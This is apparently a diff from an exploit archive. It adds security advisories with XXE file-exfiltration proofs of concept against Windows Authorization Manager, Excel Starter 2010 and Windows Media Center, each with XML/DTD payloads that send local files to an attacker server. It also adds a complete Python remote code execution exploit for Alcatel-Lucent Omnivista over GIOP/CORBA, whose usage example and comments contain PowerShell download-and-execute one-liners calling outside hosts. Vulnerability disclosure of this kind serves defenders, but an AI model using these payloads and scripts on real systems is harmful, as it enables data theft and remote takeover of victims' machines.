Create the evil XML file with following payload to steal "system.ini" as
data theft POC.
<?xml version="1.0"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://attacker-server:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
Next, create the "payload.dtd" DTD document to host on attacker server.
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker-server:8080?%file;'>">
%all;
1) Go to Windows CL and type azman to bring up Authorization Manager
2) Go to Action / "Open Authorization store..."
3) Select authorization store type to be 'XML file'
4) Browse to open the "PWN.XML" authorization store file and click Ok
User will see error message "Cannot open the authorization store. The
following problem occurred: An attempt was made
to load a program with an incorrect format."
Result: files delivered to your server!
Disclosure Timeline:
===========================================
Vendor Notification: August 30, 2016
Vendor Reply: August 30, 2016
does not meet the bar for servicing as someone would have to
obtain the XML from an untrusted source or compromised source"
December 4, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local / Remote
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx

151
platforms/windows/local/40860.txt Executable file
View file

@ -0,0 +1,151 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-STARTER-XXE-REMOTE-FILE-DISCLOSURE.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
============================
Microsoft Excel Starter 2010
EXCELC.EXE / "OFFICEVIRT.EXE"
This is a bundled Excel "starter" version that comes 'pre-loaded' with some
Windows systems running, this was tested on Windows 7 etc.
"C:\Program Files (x86)\Common Files\microsoft shared\Virtualization
Handler\CVH.EXE" "Microsoft Excel Starter 2010 9014006604090000"
C:\PROGRA~2\COMMON~1\MICROS~1\VIRTUA~1
Reference:
https://support.office.com/en-us/article/Excel-features-that-are-not-fully-supported-in-Excel-Starter-0982b3f1-7bca-49a7-a04b-3c09d05941d4
Microsoft Excel Starter 2010 is a simplified version of Excel that comes
pre-loaded on your computer.
Excel Starter includes features that are basic to creating and working with
spreadsheets, but it does not include the rich set of features found
in the full version of Excel.
Vulnerability Type:
====================
XML External Entity
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Microsoft Excel Starter OLD versions specifically ".xls" and ".xlthtml"
files are vulnerable to XML External Entity attack. This can allow
remote attackers to access and disclose ANY files from a victims computer
if they open a corrupt ".xls" Excel file. We can also abuse XXE to
make connections to the victims system/LAN and bypass Firewall,IPS etc
(XXE/SSRF).
Note: This has NOT worked in regular or updated patched Excel editions.
When open the victim will get a warn message about it being a "different
format and from trusted source".
If user choose open the file they get error message "File cannot be opened
because: System does not support the specified encoding."
Then files you target get accessed and transfered to remote server.
IF Excel version is "patched" or newer you will see message like "File
cannot be opened because: Reference to undefined entity 'send' etc..."
and XXE will fail.
Tested successfully on several machines HP, TOSHIBA Windows 7 SP1 with
Excel Starter 2010 versions. As some machines may still be running old
pre-loaded Excel version it can be relevant so I release it anyways...
Exploit code(s):
===============
POC to exfiltrate "system.ini" used by MS ADO Remote Data Services.
Listen port 8080 (ATTACKER-SERVER)
python -m SimpleHTTPServer 8080
1) "payload.dtd" ( host on attacker server port 8080 same dir as our python web server )
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-SERVER:8080?%file;'>">
%all;
2) "PWN.xls" Get vicitm to open it, ANY files belong to you!
<?xml version="1.0"?>
<!DOCTYPE APPARITION [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://ATTACKER-SERVER:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
Open the "PWN.xls" in Excel Starter 2010 then BOOM! ... its raining files!
Video POC:
https://vimeo.com/181891000
Disclosure Timeline:
=======================================
Vendor Notification: September 4, 2016
MSRC Response: "Out of date Office Client"
December 4, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx

130
platforms/windows/local/40861.txt Executable file
View file

@ -0,0 +1,130 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MEDIA-CENTER-XXE-FILE-DISCLOSURE.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.microsoft.com
Product:
==================================
Windows Media Center "ehshell.exe"
version 6.1.7600
Vulnerability Type:
====================
XML External Entity
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Windows Media Center "ehshell.exe" is vulnerable to XML External Entity
attack allowing remote access to ANY files on a victims computer, if they
open
an XXE laden ".mcl" file via a remote share / USB or from an malicious
"windowsmediacenterweb" web link.
Sometimes 'Windows Media Center' will crash, sometimes opens normally and
other times will not open, but the files get accessed and exfiltrated.
Tested Windows 7 SP1
Exploit code(s):
===============
POC exfiltrate "msdfmap.ini" used by MS ADO Remote Data Services.
1) ATTACKER-IP listener
python -m SimpleHTTPServer 8080
2) Create the "FindMeThatBiotch.dtd" DTD file with below contents (host on
ATTACKER-IP in directory where python server is listen)
<!ENTITY % param666 "<!ENTITY &#x25; FindMeThatBiotch SYSTEM '
http://ATTACKER-IP:8080/%data666;'>">
3) Create the "EVIL.mcl" file.
<?xml version="1.0"?>
<!DOCTYPE hyp3rlinx [
<!ENTITY % data666 SYSTEM "c:\Windows\msdfmap.ini">
<!ENTITY % junk SYSTEM "http://ATTACKER-IP:8080/FindMeThatBiotch.dtd">
%junk;
%param666;
%FindMeThatBiotch;
]>
4) Get victim to open the EVIL.mcl ... enjoy your files!
OR create link on webpage to run the file, but "user has to consent first".
<a href="windowsmediacenterweb://ATTACKER-IP:8080/EVIL.mcl">XXE POC</a>
Disclosure Timeline:
=======================================
Vendor Notification: September 1, 2016
Vendor opens Case 34970: September 6, 2016
Vendor reply "Wont Fix" : October 19, 2016
December 4, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx

241
platforms/windows/remote/40862.py Executable file
View file

@ -0,0 +1,241 @@
import socket
import time
import sys
import os
# ref https://blog.malerisch.net/
# Omnivista Alcatel-Lucent running on Windows Server
if len(sys.argv) < 2:
print "Usage: %s <target> <command>" % sys.argv[0]
print "eg: %s 192.168.1.246 \"powershell.exe -nop -w hidden -c \$g=new-object net.webclient;IEX \$g.downloadstring('http://192.168.1.40:8080/hello');\"" % sys.argv[0]
sys.exit(1)
target = sys.argv[1]
argument1 = ' '.join(sys.argv[2:])
# so we need to get the biosname of the target... so run this poc exploit script should be run in kali directly...
netbiosname = os.popen("nbtscan -s : "+target+" | cut -d ':' -f2").read()
netbiosname = netbiosname.strip("\n")
# dirty functions to do hex magic with bytes...
### each variable has size byte before, which includes the string + "\x00" a NULL byte
### needs to calculate for each
###
def calcsize(giop):
s = len(giop.decode('hex'))
h = hex(s) #"\x04" -> "04"
return h[2:].zfill(8) # it's 4 bytes for the size
def calcstring(param): # 1 byte size calc
s = (len(param)/2)+1
h = hex(s)
return h[2:].zfill(2) # assuming it is only 1 byte , again it's dirty...
def calcstring2(param):
s = (len(param)/2)+1
h = hex(s)
return h[2:].zfill(4)
##
#GIOP request size is specified at the 11th byte
# 0000 47 49 4f 50 01 00 00 00 00 00 00 d8 00 00 00 00 GIOP............
# d8 is the size of GIOP REQUEST
# GIOP HEADER Is 12 bytes -
# GIOP REQUEST PAYLOAD comes after and it's defined at the 11th byte
#phase 1 - add a jobset
giopid = 1 # an arbitrary ID can be put there...
# there are checks in the size of the username.. need to find where the size is specified - anyway, 58 bytes seems all right...
usernamedata = "xxx.y.zzzzz,cn=Administrators,cn=8770 administration,o=nmc".encode('hex') # original "383737302061646d696e697374726174696f6e2c6f3d6e6d63"
#print "Size of usernamedata" + str(len(usernamedata.decode('hex')))
jobname = "MYJOB01".encode('hex') # size of 7 bytes # check also in the captured packet...
addjobset = "47494f50010000000000012600000000" + "00000001" + "01000000000000135363686564756c6572496e7465726661636500000000000a4164644a6f625365740000000000000000000008" + jobname + "00000007e0000000060000001b00000010000000240000000000000000000000000000000000000000000000000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083131313131313100010000000000000000000000000000010000000000000000000000000000003f7569643d" + usernamedata + "00000000000a6f6d6e69766973626200" # this last part can be changed???
print "Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0 - RCE via GIOP/CORBA - @malerisch"
print "Connecting to target..."
p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p.connect((target, 30024))
#p = remote(target, 30024, "ipv4", "tcp")
print "Adding a job..."
p.send(addjobset.decode('hex'))
#p.recv()
data = p.recv(1024)
s = len(data)
#objectkey = "" # last 16 bytes of the response!
objectkey = data[s-16:s].encode('hex')
#print objectkey
# phase 2 - active jobset
print "Sending active packet against the job"
activegiopid = 2
active = "47494f50010000000000003100000000" + "00000002" + "0100000000000010" + objectkey + "0000000741637469766500000000000000"
#print active
p.send(active.decode('hex'))
data2 = p.recv(1024)
#print data2
# phase3 add task
addjobid = 3
print "Adding a task...."
taskname = "BBBBBBB".encode('hex')
servername = netbiosname.encode('hex')
command = "C:\Windows\System32\cmd.exe".encode('hex') #on 32bit
#command = "C:\Windows\SysWOW64\cmd.exe".encode('hex') #on 64bit
commandsize = hex((len(command.decode('hex'))+1))
commandsize = str(commandsize).replace("0x","")
#print "Command size: "+ str(commandsize)
#print command.decode('hex')
#time.sleep(10)
#powershell = str(command)
#powershell = "powershell.exe -nop -c $J=new-object net.webclient;IEX $J.downloadstring('http://192.168.1.40:8080/hello');"
#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');
#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');
argument = str("/c "+argument1).encode('hex')
#argument = str("/c notepad.exe").encode('hex')
#print len(argument.decode('hex'))
#argumentsize = len(str("/c "+powershell))+1
#print "Argument size: "+str(argumentsize)
argumentsize = calcstring2(argument)
#print "argument size: "+str(argumentsize)
#print argument.decode('hex')
def calcpadd(giop):
defaultpadding = "00000000000001"
check = giop + defaultpadding + fixedpadding
s = len(check)
#print "Size: "+str(s)
if (s/2) % 4 == 0:
#print "size ok!"
return check
else:
# fix the default padding
#print "Size not ok, recalculating padd..."
dif = (s/2) % 4
#print "diff: "+str(dif)
newpadding = defaultpadding[dif*2:]
#print "Newpadding: " +str(newpadding)
return giop + newpadding + fixedpadding
addjobhdr = "47494f5001000000" # 8 bytes + 4 bytes for message size, including size of the giop request message
fixedpadding = "000000000000000100000000000000010000000000000002000000000000000000000000000000000000000f0000000000000000000000000000000000000002000000000000000000000000"
variablepadding = "000000000001"
#print calcstring(servername)
#print calcstring(taskname)
#print "Command:" +str(command)
#print "command size:"+str(commandsize)
addjob = "00000000000000b30100000000000010" + objectkey + "000000074164644a6f62000000000000000000" + calcstring(taskname) + taskname + "0000000001000000"+ commandsize + command +"00000000" + calcstring(servername) + servername + "000000" + argumentsize + argument + "00"
#print addjob
addjobfin = calcpadd(addjob)
#print addjobfin.decode('hex')
addjobsize = calcsize(addjobfin)
#print "Lenght of the addjob: "+str(len(addjobfin.decode('hex')))
# we need to add the header
finalmsg = addjobhdr + addjobsize + addjobfin
p.send(finalmsg.decode('hex'))
data3 = p.recv(1024)
#print data3
# phase4 - execute task
executeid = 4
print "Executing task..."
execute = "47494f50010000000000003500000000000001100100000000000010" + objectkey + "0000000b457865637574654e6f7700000000000000"
p.send(execute.decode('hex'))
data4 = p.recv(1024)
print "All packets sent..."
print "Exploit sequence completed, command should have been executed...:-)"
p.close()
# optional requests to remove the job after the exploitation
### in metasploit, we should migrate to another process and then call an "abort" function of Omnivista
##phase5 - abort the job
canceljob = "47494f500100000000000030000000000000008e0100000000000010" + objectkey + "0000000743616e63656c000000000000"
###phase6 - delete the jobset
deletejob = "47494f500100000000000038000000000000009e0100000000000010" + objectkey + "0000000d44656c6574654a6f625365740000000000000000"